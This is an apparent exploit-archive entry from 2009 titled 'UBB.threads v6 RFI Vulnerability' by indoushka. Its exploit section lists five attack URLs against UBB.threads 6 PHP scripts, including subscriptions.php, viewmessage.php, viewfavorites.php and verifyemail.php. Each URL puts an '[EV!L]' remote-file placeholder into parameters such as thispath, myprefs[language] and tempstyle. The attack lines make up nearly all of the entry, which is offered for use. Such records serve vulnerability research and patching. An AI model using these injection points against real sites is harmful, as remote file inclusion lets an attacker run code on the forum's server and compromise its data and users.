id: 10525
date: 12/30/2009
title: UBB.threads v6 RFI Vulnerability
author: indoushka
cves: 

================================
UBB.threads v6 RFI Vulnerability
================================

-------------------------------------------------------------------------
# Author  : indoushka
# Script  : powered by UBB.threads, Version 6 (Powered by infopop)
# Bug     : RFI
======================         Dz-Ghost Team           ===================
# Exploit  :
  
 
1- http://server/ubbthreads/cron/php/subscriptions.php?myprefs[language]}=[EV!L]
2- http://server/ubbthreads/cron/php/subscriptions.php?thispath=[EV!L]
3- http://server/ubbthreads/viewmessage.php?myprefs[language]}=[EV!L]
4- http://server/ubbthreads/viewfavorites.php?tempstyle=[EV!L]
5- http://server/ubbthreads/verifyemail.php?thispath=[EV!L]



#  0day.today [2023-03-27]  #